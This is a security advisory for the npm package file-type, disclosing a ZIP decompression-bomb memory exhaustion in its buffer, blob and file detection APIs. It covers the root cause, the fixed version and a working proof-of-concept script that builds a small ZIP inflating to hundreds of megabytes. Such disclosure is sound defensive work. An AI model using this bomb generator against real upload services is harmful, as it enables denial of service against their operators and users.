GHSA-J47W-4G3G-C36V

Vulnerability from github – Published: 2026-03-13 20:56 – Updated: 2026-03-16 21:59
Summary
file-type: ZIP Decompression Bomb DoS via [Content_Types].xml entry
Details

Summary

A crafted ZIP file can trigger excessive memory growth during type detection in file-type when using fileTypeFromBuffer(), fileTypeFromBlob(), or fileTypeFromFile().

In affected versions, the ZIP inflate output limit is enforced for stream-based detection, but not for known-size inputs. As a result, a small compressed ZIP can cause file-type to inflate and process a much larger payload while probing ZIP-based formats such as OOXML. In testing on file-type 21.3.1, a ZIP of about 255 KB caused about 257 MB of RSS growth during fileTypeFromBuffer().
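The asymmetry this relies on is easy to reproduce with Node's built-in zlib (a standalone illustration, not file-type's code): highly repetitive data, like the space-padded XML entry used in the proof of concept below, deflates to a tiny fraction of its size.

```javascript
import {deflateRawSync, inflateRawSync} from 'node:zlib';

// 10 MiB of spaces, mimicking the padded [Content_Types].xml payload.
const payload = Buffer.alloc(10 * 1024 * 1024, 0x20);

// Maximally repetitive input deflates to a few KiB...
const compressed = deflateRawSync(payload, {level: 9});
console.log('compressed size (KiB):', (compressed.length / 1024).toFixed(1));

// ...yet inflates back to the full 10 MiB, so any code that inflates
// without an output cap pays the full cost.
console.log('inflated size (MiB):', inflateRawSync(compressed).length / 1024 / 1024);
```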

This is an availability issue. Applications that use these APIs on untrusted uploads can be forced to consume large amounts of memory and may become slow or crash.

Root Cause

The ZIP detection logic applied different limits depending on whether the tokenizer had a known file size.

For stream inputs, ZIP probing was bounded by maximumZipEntrySizeInBytes (1 MiB). For known-size inputs such as buffers, blobs, and files, the code instead used Number.MAX_SAFE_INTEGER in two relevant places:

const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)
    ? maximumZipEntrySizeInBytes
    : Number.MAX_SAFE_INTEGER;

and:

const maximumLength = hasUnknownFileSize(this.tokenizer)
    ? maximumZipEntrySizeInBytes
    : Number.MAX_SAFE_INTEGER;

Together, these checks allowed a crafted ZIP to bypass the intended inflate limit for known-size APIs and force large decompression during detection of entries such as [Content_Types].xml.
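For comparison, here is a minimal sketch of the kind of cap the stream path enforces, using node:zlib's maxOutputLength option. This is an illustration of the concept only, not the library's actual patch.

```javascript
import {deflateRawSync, inflateRawSync} from 'node:zlib';

// The 1 MiB cap named above.
const maximumZipEntrySizeInBytes = 1024 * 1024;

// A small compressed blob that inflates to 8 MiB.
const bomb = deflateRawSync(Buffer.alloc(8 * 1024 * 1024, 0x20), {level: 9});

// maxOutputLength makes the convenience method throw once the inflated
// output would exceed the cap, instead of materializing the full payload.
let entry;
try {
    entry = inflateRawSync(bomb, {maxOutputLength: maximumZipEntrySizeInBytes});
} catch {
    entry = null; // Output would exceed the cap; treat the entry as unreadable.
}
console.log(entry === null ? 'rejected oversized entry' : 'inflated within limit');
```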

Proof of Concept

import {fileTypeFromBuffer} from 'file-type';
import archiver from 'archiver';
import {Writable} from 'node:stream';

async function createZipBomb(sizeInMegabytes) {
    return new Promise((resolve, reject) => {
        const chunks = [];
        const writable = new Writable({
            write(chunk, encoding, callback) {
                chunks.push(chunk);
                callback();
            },
        });

        const archive = archiver('zip', {zlib: {level: 9}});
        archive.pipe(writable);
        writable.on('finish', () => {
            resolve(Buffer.concat(chunks));
        });
        archive.on('error', reject);

        const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">';
        const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);
        archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'});
        archive.finalize();
    });
}

const zip = await createZipBomb(256);
console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0));

const before = process.memoryUsage().rss;
await fileTypeFromBuffer(zip);
const after = process.memoryUsage().rss;

console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0));

Observed on file-type 21.3.1:

- ZIP size: about 255 KB
- RSS growth during detection: about 257 MB
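Those figures are roughly consistent with DEFLATE's theoretical best compression ratio of about 1032:1 for maximally repetitive input:

```javascript
// Expansion ratio implied by the observed numbers: ~257 MiB of RSS growth
// from a ~255 KiB ZIP, close to DEFLATE's ~1032:1 limit.
const compressedKiB = 255;
const inflatedMiB = 257;
const ratio = (inflatedMiB * 1024) / compressedKiB;
console.log(Math.round(ratio)); // ≈ 1032
```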

Affected APIs

Affected:

- fileTypeFromBuffer()
- fileTypeFromBlob()
- fileTypeFromFile()

Not affected:

- fileTypeFromStream(), which already enforced the ZIP inflate limit for unknown-size inputs

Impact

Applications that inspect untrusted uploads with fileTypeFromBuffer(), fileTypeFromBlob(), or fileTypeFromFile() can be forced to consume excessive memory during ZIP-based type detection. This can degrade service or lead to process termination in memory-constrained environments.

Cause

The issue was introduced in commit 399b0f1.


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 21.3.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "file-type"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "20.0.0"
            },
            {
              "fixed": "21.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32630"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-409"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:56:05Z",
    "nvd_published_at": "2026-03-16T14:19:40Z",
    "severity": "MODERATE"
  },
  "id": "GHSA-j47w-4g3g-c36v",
  "modified": "2026-03-16T21:59:48Z",
  "published": "2026-03-13T20:56:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32630"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/commit/399b0f156063f5aeb1c124a7fd61028f3ea7c124"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/commit/a155cd71323279de173c54e8c530d300d3854fdd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sindresorhus/file-type"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sindresorhus/file-type/releases/tag/v21.3.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "file-type: ZIP Decompression Bomb DoS via [Content_Types].xml entry"
}

